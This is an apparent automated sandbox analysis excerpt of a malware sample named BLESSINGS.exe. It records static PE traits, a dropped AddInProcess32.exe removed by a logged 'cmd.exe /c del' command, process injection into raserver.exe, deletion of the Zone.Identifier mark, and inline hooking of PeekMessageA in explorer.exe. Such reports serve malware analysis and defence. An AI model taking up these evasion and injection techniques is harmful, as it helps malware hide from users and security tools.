          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: BLESSINGS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BLESSINGS.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: BLESSINGS.exe | Static file information: File size 3427840 > 1048576
          Source: BLESSINGS.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x344200
          Source: BLESSINGS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05454B71 push es; iretd 1_2_05455094
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05450A2A push ds; ret 1_2_05450A51
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_054505E6 pushfd ; iretd 1_2_05450613
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 1_2_05454E9A push es; iretd 1_2_05455094
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CEB5 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF6C push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF02 push eax; ret 8_2_0041CF08
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0041CF0B push eax; ret 8_2_0041CF72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 8_2_0178D0D1 push ecx; ret 8_2_0178D0E4
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_0457D0D1 push ecx; ret 15_2_0457D0E4
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ED856 push esi; ret 15_2_001ED859
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECEB5 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF0B push eax; ret 15_2_001ECF72
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF02 push eax; ret 15_2_001ECF08
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 15_2_001ECF6C push eax; ret 15_2_001ECF72
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\BLESSINGS.exe | File opened: C:\Users\user\Desktop\BLESSINGS.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
          Source: C:\Users\user\Desktop\BLESSINGS.exe | Process information set: NOOPENFILEERRORBOX